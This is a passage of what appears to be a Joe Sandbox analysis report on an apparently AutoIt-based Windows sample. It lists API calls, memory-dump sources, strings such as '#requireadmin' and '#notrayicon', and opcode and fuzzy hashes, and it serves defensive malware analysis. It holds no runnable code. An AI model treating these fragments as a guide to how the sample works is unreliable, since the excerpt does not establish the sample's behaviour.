                                                                                                                  • _wcscat.LIBCMT ref: 00DB6AA4
                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00DB6B0C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2323102230-1173974218
                                                                                                                  • Opcode ID: 23fecba9e863b6e73c4c995a2008f7a3f8b1656f0085d6eeedcc6621beb7a170
                                                                                                                  • Instruction ID: 9b01dd308116bd7c8d8c8c27690ee9d66288c7675b4c9194400c77460065058d
                                                                                                                  • Opcode Fuzzy Hash: 23fecba9e863b6e73c4c995a2008f7a3f8b1656f0085d6eeedcc6621beb7a170
                                                                                                                  • Instruction Fuzzy Hash: A0310271900219AACF51EFA4D845BDDB7B8AF08300F5495AAE50AE3141EB34DB89CF74
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                  • Opcode ID: 62f1bf04084be17e8d715623dc296ecf1703f89d045541e260e56c8b4defb455
                                                                                                                  • Instruction ID: c731c6716bd983bf2b3f6b8f8f05e861bd5c575c7c0a52adde85c52277641ad8
                                                                                                                  • Opcode Fuzzy Hash: 62f1bf04084be17e8d715623dc296ecf1703f89d045541e260e56c8b4defb455
                                                                                                                  • Instruction Fuzzy Hash: 77210732208611FAD731BA359C02EF7B3A8DF69310F144025F48797181EB919A82E3B1
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB180D
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB1833
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00DB1836
                                                                                                                  • SysAllocString.OLEAUT32 ref: 00DB1857
                                                                                                                  • SysFreeString.OLEAUT32 ref: 00DB1860
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DB187A
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00DB1888
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: a0466832abaa1285b05b0ddad6c0d7a5848f06bdd9c0293345d9a5ca328e1ff6
                                                                                                                  • Instruction ID: ecde4fda291e8337540313e0001b46bd9c25b5ab984dda280d269f82db65cd80
                                                                                                                  • Opcode Fuzzy Hash: a0466832abaa1285b05b0ddad6c0d7a5848f06bdd9c0293345d9a5ca328e1ff6
                                                                                                                  • Instruction Fuzzy Hash: 91213279600204BF9B109BA8DC89DBE77EDFB093607948125F915DB264DA70EC41C774
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                    • Part of subcall function 00D8C619: GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                    • Part of subcall function 00D8C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DDA13B
                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DDA148
                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DDA153
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DDA162
                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DDA16E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                  • Opcode ID: 0efb3241e45f863a496a8de1f87385603d59fe5c16914f6b076feb30a93a0dc2
                                                                                                                  • Instruction ID: 13e578798f41acaaa8022b20e9f523a55281535e76d2d3ea6f41e7be5a15a2bf
                                                                                                                  • Opcode Fuzzy Hash: 0efb3241e45f863a496a8de1f87385603d59fe5c16914f6b076feb30a93a0dc2
                                                                                                                  • Instruction Fuzzy Hash: 2011B2B115021DBEEF115F65CC86EEB7F5DEF08798F018215FA08A6190C6769C21DBB0
                                                                                                                  APIs
                                                                                                                  • __getptd_noexit.LIBCMT ref: 00D94C3E
                                                                                                                    • Part of subcall function 00D986B5: GetLastError.KERNEL32(?,00D90127,00D988A3,00D94673,?,?,00D90127,?,00D7125D,00000058,?,?), ref: 00D986B7
                                                                                                                    • Part of subcall function 00D986B5: __calloc_crt.LIBCMT ref: 00D986D8
                                                                                                                    • Part of subcall function 00D986B5: GetCurrentThreadId.KERNEL32 ref: 00D98701
                                                                                                                    • Part of subcall function 00D986B5: SetLastError.KERNEL32(00000000,00D90127,00D988A3,00D94673,?,?,00D90127,?,00D7125D,00000058,?,?), ref: 00D98719
                                                                                                                  • CloseHandle.KERNEL32(?,?,00D94C1D), ref: 00D94C52
                                                                                                                  • __freeptd.LIBCMT ref: 00D94C59
                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,00D94C1D), ref: 00D94C61
                                                                                                                  • GetLastError.KERNEL32(?,?,00D94C1D), ref: 00D94C91
                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,?,00D94C1D), ref: 00D94C98
                                                                                                                  • __freefls@4.LIBCMT ref: 00D94CB4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1445074172-0
                                                                                                                  • Opcode ID: 47536b5182a997f46daf4046f6b2980b8747d73fb53471cf27529ec0c342d590
                                                                                                                  • Instruction ID: 6423e088f75a3609588610292f0b27c784111f7e443058f61930de72192bfd95
                                                                                                                  • Opcode Fuzzy Hash: 47536b5182a997f46daf4046f6b2980b8747d73fb53471cf27529ec0c342d590
                                                                                                                  • Instruction Fuzzy Hash: F301DF70401701AFCF18BBB4D909D1D7BE6EF06B187188519F509CB252EF34D942DAB1
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DDE14D
                                                                                                                  • _memset.LIBCMT ref: 00DDE15C
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E33EE0,00E33F24), ref: 00DDE18B
                                                                                                                  • CloseHandle.KERNEL32 ref: 00DDE19D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                  • String ID: $?$>
                                                                                                                  • API String ID: 3277943733-2278415509
                                                                                                                  • Opcode ID: d4662a62a4b765233a02fcbbd21483c09e1329c74ff307a16e6127b695a53e24
                                                                                                                  • Instruction ID: c9629ddbf124ff1cc59d02e8723adf9fd86a4780712551956ee38b8711e53bf8
                                                                                                                  • Opcode Fuzzy Hash: d4662a62a4b765233a02fcbbd21483c09e1329c74ff307a16e6127b695a53e24
                                                                                                                  • Instruction Fuzzy Hash: 29F054F5A40305BFE7105776AC0AFB77E6DDB05355F404421BA14E6192D3B64E0086B4
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D8C6C0
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D8C701
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D8C729
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D8C856
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D8C86F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1296646539-0
                                                                                                                  • Opcode ID: 9aeec574c4f4e32fb80f53c455ae40cd00fd83af0b6c43f5f0dfa5e8e5ef017d
                                                                                                                  • Instruction ID: 1c74ce1f9f0c35689768b35165a5536f713960823c7af9177be56c036a3a8367
                                                                                                                  • Opcode Fuzzy Hash: 9aeec574c4f4e32fb80f53c455ae40cd00fd83af0b6c43f5f0dfa5e8e5ef017d
                                                                                                                  • Instruction Fuzzy Hash: 11B13979910649DBDB10DFA9C9807EDB7B1FF08710F18952AEC99EB254EB30A940CB74
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3253778849-0
                                                                                                                  • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                  • Instruction ID: 46ecb481bf539bdea6132f6a9aa4129ebde7f9c9e8b8c28c0ea373a8b284f6ae
                                                                                                                  • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                  • Instruction Fuzzy Hash: 9B61893051025AABCF05EF60CC92EFE77A9EF04318F048459F95A6B292EB74E905DB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD2FA0
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DD2FE0
                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00DD3003
                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DD302C
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DD306F
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD307C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4046560759-0
                                                                                                                  • Opcode ID: a88dc1922e5cfbee5e02c9af8fab3dd5a9cdf06e06c36c45c96f45db34b1b1b7
                                                                                                                  • Instruction ID: 8527fa0be40c0953e07d792706d67bd75a2692de7c6917edc1427a3684e466a8
                                                                                                                  • Opcode Fuzzy Hash: a88dc1922e5cfbee5e02c9af8fab3dd5a9cdf06e06c36c45c96f45db34b1b1b7
                                                                                                                  • Instruction Fuzzy Hash: 0D513871108304AFC715EF64C885E6AB7E9FF88304F04891EF596872A1EB71EA05CB72
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2037614760-0
                                                                                                                  • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                  • Instruction ID: 99698add9d0c4895d828e00f825cf8c484aba8d221374eb6c9d663a154abd5cf
                                                                                                                  • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                  • Instruction Fuzzy Hash: 3E51F770904225AACF11BF9AC4419BDB3B2EF08710F68404AF581AB2D1DB749F82D7B1
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DB2AF6
                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00DB2B68
                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00DB2BC3
                                                                                                                  • _memmove.LIBCMT ref: 00DB2BED
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DB2C3A
                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DB2C68
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1101466143-0
                                                                                                                  • Opcode ID: 2b9193b958ec260f2355dff80dfa8ac0bc3a49b617fc102b1e318fc49796d30e
                                                                                                                  • Instruction ID: 0e7d5fb46b78488c109ab71142961aae89c00f42cd46e6961ec9c991853deb12
                                                                                                                  • Opcode Fuzzy Hash: 2b9193b958ec260f2355dff80dfa8ac0bc3a49b617fc102b1e318fc49796d30e
                                                                                                                  • Instruction Fuzzy Hash: 48513CB5A00209EFDB14CF58C884EAAB7B9FF4C314B158559E95ADB314D730EA51CFA0
                                                                                                                  APIs
                                                                                                                  • GetMenu.USER32(?), ref: 00DD833D
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00DD8374
                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DD839C
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00DD840B
                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00DD8419
                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00DD846A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 650687236-0
                                                                                                                  • Opcode ID: c6c933d39ecca056bfb1e1d709adb5c8baa66372c82555d327c0155630cc0fae
                                                                                                                  • Instruction ID: 3e606794420bc5f2223cce5d03e696bbf4588353c3de25b26d6d3d37df556ac4
                                                                                                                  • Opcode Fuzzy Hash: c6c933d39ecca056bfb1e1d709adb5c8baa66372c82555d327c0155630cc0fae
                                                                                                                  • Instruction Fuzzy Hash: 44516E75A00215EFCB01DF54C841AAEB7B6EF48710F14845AE915F7351DB70AE419BB0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB552E
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DB5579
                                                                                                                  • IsMenu.USER32(00000000), ref: 00DB5599
                                                                                                                  • CreatePopupMenu.USER32 ref: 00DB55CD
                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00DB562B
                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00DB565C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3311875123-0
                                                                                                                  • Opcode ID: 74b91011ffa742a9d3166f87842a92f86f39d8da7c156ca21d9ae9d7a3ed2565
                                                                                                                  • Instruction ID: c92fc7060c75ee5fb1c9c43ba614226107db0f8724326e29780d2f1207dd61c1
                                                                                                                  • Opcode Fuzzy Hash: 74b91011ffa742a9d3166f87842a92f86f39d8da7c156ca21d9ae9d7a3ed2565
